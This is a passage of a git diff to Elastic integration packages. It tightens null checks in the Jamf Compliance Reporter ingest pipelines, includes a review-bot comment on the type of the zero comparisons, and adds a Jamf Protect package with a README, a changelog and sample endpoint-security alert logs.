- if: ctx.event?.action == 'preference_list_event'
+ if: ctx.event.action == 'preference_list_event'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_print_event_information" }}'
- if: ctx.event?.action == 'print_event_information'
+ if: ctx.event.action == 'print_event_information'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_prohibited_app_blocked" }}'
- if: ctx.event?.action == 'prohibited_app_blocked'
+ if: ctx.event.action == 'prohibited_app_blocked'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_signal_event" }}'
- if: ctx.event?.action == 'signal_event'
+ if: ctx.event.action == 'signal_event'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_unified_log_event" }}'
- if: ctx.event?.action == 'unified_log_event'
+ if: ctx.event.action == 'unified_log_event'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_xprotect_definitions_version_info" }}'
- if: ctx.event?.action == 'xprotect_definitions_version_info'
+ if: ctx.event.action == 'xprotect_definitions_version_info'
 - pipeline:
 name: '{{ IngestPipeline "pipeline_xprotect_event_log" }}'
- if: ctx.event?.action == 'xprotect_event_log'
+ if: ctx.event.action == 'xprotect_event_log'
 on_failure:
 - set:
 field: event.kind
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_license_info_event.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_license_info_event.yml
index befa9e52075..cfca45d4f75 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_license_info_event.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_license_info_event.yml
@@ -14,7 +14,7 @@ processors:
 - date:
 field: json.ComplianceReporter_license_info.expiration_date
 target_field: jamf_compliance_reporter.log.compliancereporter_license_info.expiration_date
- if: ctx.json?.compliancereporter_license_info?.expiration_date != 0
+ if: ctx.json?.ComplianceReporter_license_info?.expiration_date != null && ctx.json.ComplianceReporter_license_info.expiration_date != 0
 formats:
 - dd/MM/yyyy
 on_failure:
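Review bot: The `+` condition of the `@@ -14,7` hunk in pipeline_license_info_event.yml compares `expiration_date` with the integer `0`, yet the context line below parses that field with the `dd/MM/yyyy` format, so the value is presumably a string and `!= 0` is always true; the sibling hunk at `@@ -28,7` in the same file compares `time_seconds_epoch` with the string `'0'`, and the `@@ -126,7` hunk in pipeline_unified_log_event.yml applies `!= 0` to a `yyyy-MM-dd HH:mm:ss.SSSSSSZ` timestamp. Use the type the source actually emits for each field — `!= '0'` where it is a string — or drop the zero comparison and keep only the null guard, so the intent is not silently a no-op. Worth noting separately: the removed condition referenced `ctx.json?.compliancereporter_license_info`, a lowercase path that does not match the `json.ComplianceReporter_license_info.expiration_date` field, so the date processor previously ran unconditionally; the corrected case is a behaviour change that should be named in the changelog entry rather than folded into the generic "Clean up null handling" line.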
@@ -28,7 +28,7 @@ processors:
 - date:
 field: json.ComplianceReporter_license_info.time_seconds_epoch
 target_field: jamf_compliance_reporter.log.compliancereporter_license_info.time
- if: ctx.json?.compliancereporter_license_info?.time_seconds_epoch != '0'
+ if: ctx.json?.ComplianceReporter_license_info?.time_seconds_epoch != null && ctx.json.ComplianceReporter_license_info.time_seconds_epoch != '0'
 formats:
 - UNIX
 on_failure:
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_print_event_information.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_print_event_information.yml
index 53089b79003..f61a2a417b5 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_print_event_information.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_print_event_information.yml
@@ -4,7 +4,7 @@ processors:
 - date:
 field: json.event_attributes.job_completed_time
 target_field: jamf_compliance_reporter.log.event_attributes.job.completed_time
- if: ctx.json?.event_attributes?.job_completed_time != 0
+ if: ctx.json?.event_attributes?.job_completed_time != null && ctx.json.event_attributes.job_completed_time != 0
 formats:
 - UNIX
 on_failure:
@@ -14,7 +14,7 @@ processors:
 - date:
 field: json.event_attributes.job_creation_time
 target_field: jamf_compliance_reporter.log.event_attributes.job.creation_time
- if: ctx.json?.event_attributes?.job_creation_time != 0
+ if: ctx.json?.event_attributes?.job_creation_time != null && ctx.json.event_attributes.job_creation_time != 0
 formats:
 - UNIX
 on_failure:
@@ -38,7 +38,7 @@ processors:
 - date:
 field: json.event_attributes.job_processing_time
 target_field: jamf_compliance_reporter.log.event_attributes.job.processing_time
- if: ctx.json?.event_attributes?.job_processing_time != 0
+ if: ctx.json?.event_attributes?.job_processing_time != null && ctx.json.event_attributes.job_processing_time != 0
 formats:
 - UNIX
 on_failure:
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_prohibited_app_blocked.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_prohibited_app_blocked.yml
index 65cd966e05c..1da8afa7087 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_prohibited_app_blocked.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_prohibited_app_blocked.yml
@@ -263,8 +263,10 @@ processors:
 source: |
 def args_list = new ArrayList();
 ctx.process.args = args_list;
- for (Map.Entry m : ctx.json?.args.entrySet()) {
- ctx.process?.args.add(m.getValue());
+ if (ctx.json?.args != null) {
+ for (Map.Entry m : ctx.json.args.entrySet()) {
+ ctx.process.args.add(m.getValue());
+ }
 }
 on_failure:
 - set:
diff --git a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_unified_log_event.yml b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_unified_log_event.yml
index 3d09d08e13e..6ed92eca548 100644
--- a/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_unified_log_event.yml
+++ b/packages/jamf_compliance_reporter/data_stream/log/elasticsearch/ingest_pipeline/pipeline_unified_log_event.yml
@@ -126,7 +126,7 @@ processors:
 - date:
 field: json.event_attributes.timestamp
 target_field: jamf_compliance_reporter.log.event_attributes.timestamp
- if: ctx.json?.event_attributes?.timestamp != 0
+ if: ctx.json?.event_attributes?.timestamp != null && ctx.json.event_attributes.timestamp != 0
 formats:
 - yyyy-MM-dd HH:mm:ss.SSSSSSZ
 on_failure:
diff --git a/packages/jamf_compliance_reporter/manifest.yml b/packages/jamf_compliance_reporter/manifest.yml
index 12845a0e929..88305aaa722 100644
--- a/packages/jamf_compliance_reporter/manifest.yml
+++ b/packages/jamf_compliance_reporter/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: jamf_compliance_reporter
 title: Jamf Compliance Reporter
-version: "1.11.1"
+version: "1.12.0"
 description: Collect logs from Jamf Compliance Reporter with Elastic Agent.
 type: integration
 categories:
diff --git a/packages/jamf_protect/_dev/build/build.yml b/packages/jamf_protect/_dev/build/build.yml
new file mode 100644
index 00000000000..2bfcfc223b0
--- /dev/null
+++ b/packages/jamf_protect/_dev/build/build.yml
@@ -0,0 +1,3 @@
+dependencies:
+ ecs:
+ reference: "git@v8.11.0"
diff --git a/packages/jamf_protect/_dev/build/docs/README.md b/packages/jamf_protect/_dev/build/docs/README.md
new file mode 100644
index 00000000000..f2ac960cc62
--- /dev/null
+++ b/packages/jamf_protect/_dev/build/docs/README.md
@@ -0,0 +1,112 @@ +# Jamf Protect + +The Jamf Protect integration collects and parses data received from [Jamf Protect](https://learn.jamf.com/bundle/jamf-protect-documentation/page/About_Jamf_Protect.html) using a HTTP endpoint. + +Use the Jamf Protect integration to collect logs from your machines. +Then visualize that data in Kibana, create alerts to notify you if something goes wrong, and reference data when troubleshooting an issue. + +## Data streams + +The Jamf Protect integration collects 4 types of events: alerts, telemetry, web threat events, and web traffic events. + +[**Alerts**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Alerts.html) help you keep a record of Alerts and Unified Logs happening on endpoints using Jamf Protect. + +[**Telemetry**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Creating_an_Action_Configuration.html) help you keep a record of audit events happening on endpoints using Jamf Protect. + +[**Web threat events**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Data_Streams_Overview.html) help you keep a record of web threat events happening on endpoints using Jamf Protect. + +[**Web traffic events**](https://learn.jamf.com/en-US/bundle/jamf-protect-documentation/page/Data_Streams_Overview.html) help you keep a record of content filtering and network requests happening on endpoints using Jamf Protect. + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. 
+ +## Setup + +To use this integration, you will also need to: +- Enable the integration in Elastic +- Configure Jamf Protect (macOS Security) to send logs to the Elastic Agent (Custom HTTP Endpoint Logs) + - Remote Alert Collection Endpoints + - Unified Logs Collection Endpoints + - Telemetry Collection Endpoints +- Configure Jamf Protect (Jamf Security Cloud) to send logs to the Elastic Agent (Custom HTTP Endpoint Logs) + - Threat Event Stream + - Network Traffic Stream + + +### Enable the integration in Elastic + +For step-by-step instructions on how to set up an new integration in Elastic, see the +[Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. +When setting up the integration, you will choose to collect logs via HTTP Endpoint. + +### Configure Jamf Protect + +After validating settings, you can configure Jamf Protect to send events to Elastic. +For more information on configuring Jamf Protect, see +- [Creating an Action Configuration](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Creating_an_Action_Configuration.html) +- [Configure Threat Event Stream](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Configuring_the_Network_Threat_Events_Stream_to_send_HTTP_Events.html) +- [Configure Network Traffic Stream](https://learn.jamf.com/bundle/jamf-protect-documentation/page/Configuring_the_Network_Threat_Events_Stream_to_send_HTTP_Events.html) + +Then, depending on which events you want to send to Elastic, configure one or multiple HTTP endpoints: + +**Remote Alert Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Unified Logs Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. 
+ +**Telemetry Collection Endpoints**: +- In the URL field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Threats Event Stream**: +- In the Server hostname or IP field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + +**Network Traffic Stream**: +- In the Server hostname or IP field, enter the full URL with port using this format: `http[s]://{ELASTICAGENT_ADDRESS}:{AGENT_PORT}`. + + +**Copyright (c) 2024, Jamf Software, LLC. All rights reserved.** + +## Logs reference + +#### alerts + +This is the `Alerts` dataset. + +##### Example + +{{event "alerts"}} + +{{fields "alerts"}} + +#### telemetry + +This is the `Telemetry` dataset. + +##### Example + +{{event "telemetry"}} + +{{fields "telemetry"}} + +#### threats event stream + +This is the `Threats Event Stream` dataset. + +##### Example + +{{event "web_threat_events"}} + +{{fields "web_threat_events"}} + +#### network traffic stream + +This is the `Network Traffic Stream` dataset. + +##### Example + +{{event "web_traffic_events"}} + +{{fields "web_traffic_events"}} \ No newline at end of file diff --git a/packages/jamf_protect/changelog.yml b/packages/jamf_protect/changelog.yml new file mode 100644 index 00000000000..eb18a7af5fd --- /dev/null +++ b/packages/jamf_protect/changelog.yml @@ -0,0 +1,16 @@ +# newer versions go on top +- version: "0.3.0" + changes: + - description: Fixing json renaming. + type: enhancement + link: https://github.com/elastic/integrations/pull/9581 +- version: "0.2.0" + changes: + - description: Adding parent.process_entity_id. + type: enhancement + link: https://github.com/elastic/integrations/pull/9577 +- version: "0.1.0" + changes: + - description: Initial release of Jamf Protect integration for Elastic. + type: enhancement + link: https://github.com/elastic/integrations/pull/9135 
diff --git a/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log b/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log
new file mode 100644
index 00000000000..a73e5285508
--- /dev/null
+++ b/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log
@@ -0,0 +1,11 @@ +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.2 (Build 23C5030f)","ips":["175.16.199.1"],"serial":"C02ZW0GTLVDL","hostname":"LMAC-ZW0GTLVDL","protectVersion":"5.1.1.2","provisioningUDID":"32EC79C5-26DC-535A-85F7-986F063297E2"},"match":{"tags":["Visibility"],"uuid":"6bdb0697-6d07-47bc-a37d-6c3348a5d953","event":{"dev":16777225,"gid":0,"pid":15910,"uid":0,"path":"/Applications/.Microsoft Teams (work or school).app.installBackup","type":3,"uuid":"391104e6-ca86-4afb-82c0-7453595624a6","iNode":19478271,"eventID":154840,"prevFile":"/Applications/Microsoft Teams (work or school).app","timestamp":1700566364.184953},"facts":[{"name":"CustomURLHandlerCreation","tags":["Visibility"],"uuid":"25a295ca-f4b3-4f78-8faa-80e9182645f1","human":"Application that uses custom url handler created","actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"Signer","value":"4","valueType":"String"},{"name":"BundleURLTypes","value":"{\n CFBundleTypeRole = Editor;\n CFBundleURLName = \"com.microsoft.teams2\";\n CFBundleURLSchemes = (\n msteams\n );\n}","valueType":"String"}],"version":1,"severity":0}],"custom":false,"actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"Signer","value":"4","valueType":"String"},{"name":"BundleURLTypes","value":"{\n CFBundleTypeRole = Editor;\n CFBundleURLName = \"com.microsoft.teams2\";\n CFBundleURLSchemes = (\n msteams\n );\n}","valueType":"String"}],"severity":0},"related":{"files":[{"gid":0,"uid":0,"fsid":16777225,"mode":16804,"path":"/Applications/.Microsoft Teams (work or 
school).app.installBackup","size":96,"inode":19478271,"xattrs":["com.apple.macl"],"changed":1700566364,"created":0,"sha1hex":"","accessed":1698762823,"modified":1698762823,"sha256hex":"","isDownload":false,"objectType":"GPSystemObject","isAppBundle":true,"isDirectory":true,"signingInfo":{"appid":"","status":-67062,"teamid":"","signerType":4,"authorities":[],"entitlements":[],"statusMessage":"code object is not signed at all","informationStage":"extended"},"isScreenShot":false}],"users":[{"uid":0,"name":"root","uuid":"C02ZW0GTLVDL0"}],"groups":[{"gid":0,"name":"wheel","uuid":"C02ZW0GTLVDL0"}],"binaries":[{"gid":0,"uid":0,"fsid":16777225,"mode":33261,"path":"/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper","size":293200,"inode":19877984,"xattrs":[],"changed":1700045896,"created":1700045896,"sha1hex":"5ddcd49004e66cead79ca82991f1b4d4a8ba52d9","accessed":1700045896,"modified":1700045896,"sha256hex":"8fd91d9d1ca53ef93921c8072e12ec082c9eba62bf93f0f900e71b6aa4fa0ed8","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.microsoft.autoupdate.helper","cdhash":"Ji34X0RVyhgstFZxr7Jsmtnf8Ts=","status":0,"teamid":"UBF8T346G9","signerType":2,"authorities":["Developer ID Application: Microsoft Corporation (UBF8T346G9)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No 
error.","informationStage":"extended"},"isScreenShot":false}],"processes":[{"gid":0,"pid":15910,"uid":0,"args":["/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper","XPC_SERVICE_NAME=com.microsoft.autoupdate.helper","PATH=/usr/bin:/bin:/usr/sbin:/sbin","XPC_FLAGS=1","pfz=0x7ffffff12000","stack_guard=0x94bec1a9eb9800ea","malloc_entropy=0x7777a3bc060946c0,0x6f95455435250cbc","ptr_munge=0x749c1515ccadfca","main_stack=0x7ff7bf6da000,0x800000,0x7ff7bb6da000,0x4000000","executable_file=0x1a01000009,0x12f5060","dyld_file=0x1a01000009,0xfffffff000982f7","executable_cdhash=262df85f4455ca182cb45671afb26c9ad9dff13b","executable_boothash=1fc9ca7065a4d7a9c299cc51414c052e5d7025d7","th_port=0x103"],"name":"com.microsoft.autoupdate.helper","path":"/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper","pgid":15910,"ppid":1,"rgid":0,"ruid":0,"uuid":"b8cd6fa5-e8c3-4f05-88a0-68469d04806c","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.microsoft.autoupdate.helper","cdhash":"Ji34X0RVyhgstFZxr7Jsmtnf8Ts=","status":0,"teamid":"UBF8T346G9","signerType":2,"authorities":["Developer ID Application: Microsoft Corporation (UBF8T346G9)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":15910,"startTimestamp":1700566364,"originalParentPID":1,"processIdentifier":266122}]},"eventType":"GPFSEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.0 (Build 
23A344)","ips":["175.16.199.2"],"serial":"Z2C23RW4DY","hostname":"VMAC-2C23RW4DY","protectVersion":"5.1.0.4","provisioningUDID":"0000FE00-8406CE28ECFC4DAB"},"match":{"tags":["MITREattack","DefenseEvasion","T1548.004","AbuseElevationControlMechanism","PrivilegeEscalation"],"uuid":"7232d4a4-2289-49ba-a218-215ef3d62ec4","event":{"pid":3136,"type":1,"uuid":"e19385fc-6077-4d00-ad56-b89eec15e730","subType":7,"timestamp":1698841238.851668},"facts":[{"name":"User Elevated Action","tags":["DefenseEvasion","T1548.004","PrivilegeEscalation","MITREattack","AbuseElevationControlMechanism"],"uuid":"db094865-99c2-416c-9f06-e7740d9e8a20","human":"Application used deprecated elevation API","actions":[{"name":"Report"}],"context":[],"version":1,"severity":0}],"custom":false,"actions":[{"name":"Report"}],"context":[],"severity":0},"related":{"files":[],"users":[{"uid":0,"name":"root","uuid":"Z2C23RW4DY0"},{"uid":501,"name":"local-admin","uuid":"Z2C23RW4DY1f5"}],"groups":[{"gid":0,"name":"wheel","uuid":"Z2C23RW4DY0"},{"gid":20,"name":"staff","uuid":"Z2C23RW4DY14"}],"binaries":[{"gid":0,"uid":0,"fsid":16777230,"mode":35273,"path":"/usr/libexec/security_authtrampoline","size":134768,"inode":1152921500312504800,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"82e899cb1c8a42b74653b05ca526d5feae92b9f6","accessed":1694870910,"modified":1694870910,"sha256hex":"7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.security_authtrampoline","cdhash":"rbIoddPMz9MoMMZl1ATihY8wlMk=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":33261,"path":"/Library/Application Support/JAMF/Remote 
Assist/jamfRemoteAssistLauncher","size":6929392,"inode":4631313,"xattrs":[],"changed":1698101729,"created":1697718684,"sha1hex":"4f16310b5f518c8b0bd29afdfb8e2ca7a5a0b0b3","accessed":1698818094,"modified":1697718684,"sha256hex":"b6e3e8d03cb0b11bf0e30649fcb3755e58babd00f942e07f85b656980fe4d9ff","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.jamf.remoteassist.launcher","cdhash":"OkjDuX0cFaDreH32s6FfHKg1FqE=","status":0,"teamid":"483DWKW443","signerType":2,"authorities":["Developer ID Application: JAMF Software (483DWKW443)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":35145,"path":"/usr/bin/sudo","size":1446192,"inode":1152921500312502700,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"8e860430a91946640dcc5161c726a39dc8576cc3","accessed":1694870910,"modified":1694870910,"sha256hex":"38e7f57d53e3c8847ea3361085e13d87849b31f588bfe9e9e1c02abfac542aef","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.sudo","cdhash":"LZl8hBA1BePrgPrqw+Ap/HR6YUg=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No 
error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":33133,"path":"/bin/bash","size":1310224,"inode":1152921500312501200,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"db9d08f69e6bff5c31ff7d7a0da06a0a8311c393","accessed":1694870910,"modified":1694870910,"sha256hex":"4c70b5307a375045d205dbff19dc96fdaa25a77061446259204657c97726c70a","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.bash","cdhash":"w8D5iqHkJJxjGQGuFQLtfzG2Wes=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":33261,"path":"/bin/zsh","size":1377584,"inode":1152921500312501200,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"959ade1e4967a51eb8757d723d5040090fdfcb5c","accessed":1694870910,"modified":1694870910,"sha256hex":"ccb1ba009baa2353c3806fe4f56349497b542104b5104e7a82b8f8ce2304ec03","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.zsh","cdhash":"f8w59TUpUrUhesGyuRBvXldP3Q0=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No 
error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":35181,"path":"/usr/bin/login","size":172032,"inode":1152921500312502100,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"875c999ee4df1a16d7654636714f852f55d1cc57","accessed":1694870910,"modified":1694870910,"sha256hex":"4fa5b402145c8228454641e232d3d4b4152df143bf3ffda98d75c200e661baf4","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.login","cdhash":"MnR8eKbXO4v5eUokTXLWEDUfCVY=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":["com.apple.private.endpoint-security.submit.login","com.apple.private.security.clear-library-validation"],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":33261,"path":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","size":2222656,"inode":1152921500311913100,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"14c2df1ea5a91fed7527fcfdff74268e19524eb3","accessed":1694870910,"modified":1694870910,"sha256hex":"17a6a338efd6052c871a6da90b81c483a3edea43c056326587735b89feaf189c","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.Terminal","cdhash":"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false}],"processes":[{"gid":0,"pid":3136,"tty":"/dev/ttys016","uid":0,"args":["/usr/libexec/security_authtrampoline","/Library/Application Support/JAMF/Remote Assist/Wipe","auth 
16"],"name":"security_authtrampoline","path":"/usr/libexec/security_authtrampoline","pgid":3096,"ppid":3099,"rgid":0,"ruid":0,"uuid":"c821d617-2ce5-4475-aae6-c428a1ad9e8c","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.security_authtrampoline","cdhash":"rbIoddPMz9MoMMZl1ATihY8wlMk=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841238,"originalParentPID":3099,"processIdentifier":6750},{"gid":0,"pid":3099,"tty":"/dev/ttys016","uid":0,"args":["/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher","/operation=connector.uninstall"],"name":"jamfRemoteAssistLauncher","path":"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher","pgid":3096,"ppid":3098,"rgid":0,"ruid":0,"uuid":"a382cfda-8964-4388-8c19-49d4eaef2ae7","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.jamf.remoteassist.launcher","cdhash":"OkjDuX0cFaDreH32s6FfHKg1FqE=","status":0,"teamid":"483DWKW443","signerType":2,"authorities":["Developer ID Application: JAMF Software (483DWKW443)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841236,"originalParentPID":3098,"processIdentifier":6654},{"gid":20,"pid":3098,"tty":"/dev/ttys016","uid":0,"args":["sudo","/Library/Application Support/JAMF/Remote 
Assist/jamfRemoteAssistLauncher","/operation=connector.uninstall"],"name":"sudo","path":"/usr/bin/sudo","pgid":3096,"ppid":3096,"rgid":20,"ruid":501,"uuid":"31060be9-a210-4e18-bec5-2b0b6c482563","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.sudo","cdhash":"LZl8hBA1BePrgPrqw+Ap/HR6YUg=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841234,"originalParentPID":3096,"processIdentifier":6652},{"gid":20,"pid":3096,"tty":"/dev/ttys016","uid":501,"args":["/bin/sh","/Library/Application Support/JAMF/Remote Assist/Uninstall"],"name":"bash","path":"/bin/bash","pgid":3096,"ppid":3063,"rgid":20,"ruid":501,"uuid":"6600050c-406a-4cd6-8c31-1eefe04fea65","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.bash","cdhash":"w8D5iqHkJJxjGQGuFQLtfzG2Wes=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841233,"originalParentPID":3063,"processIdentifier":6650},{"gid":20,"pid":3063,"uid":501,"args":["-zsh"],"name":"zsh","path":"/bin/zsh","pgid":3063,"ppid":3062,"rgid":20,"ruid":501,"uuid":"f596588c-0db5-4fdb-bd64-95584398c596","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.zsh","cdhash":"f8w59TUpUrUhesGyuRBvXldP3Q0=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No 
error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841233,"originalParentPID":3062,"processIdentifier":6608},{"gid":20,"pid":3062,"uid":0,"args":["login","-pf","local-admin"],"name":"login","path":"/usr/bin/login","pgid":3062,"ppid":765,"rgid":20,"ruid":501,"uuid":"bfd4dcd0-5054-4cab-9b8f-1e650d977771","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.login","cdhash":"MnR8eKbXO4v5eUokTXLWEDUfCVY=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":["com.apple.private.endpoint-security.submit.login","com.apple.private.security.clear-library-validation"],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841233,"originalParentPID":765,"processIdentifier":6606},{"gid":20,"pid":765,"uid":501,"args":["/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"],"name":"Terminal","path":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","pgid":765,"ppid":1,"rgid":20,"ruid":501,"uuid":"7fb1cc18-b1a9-467a-880a-3a6e86960880","flags":[],"appPath":"/System/Applications/Utilities/Terminal.app","processType":"GPSystemObject","signingInfo":{"appid":"com.apple.Terminal","cdhash":"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698840671,"originalParentPID":1,"processIdentifier":1812}]},"eventType":"GPProcessEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.3 (Build 
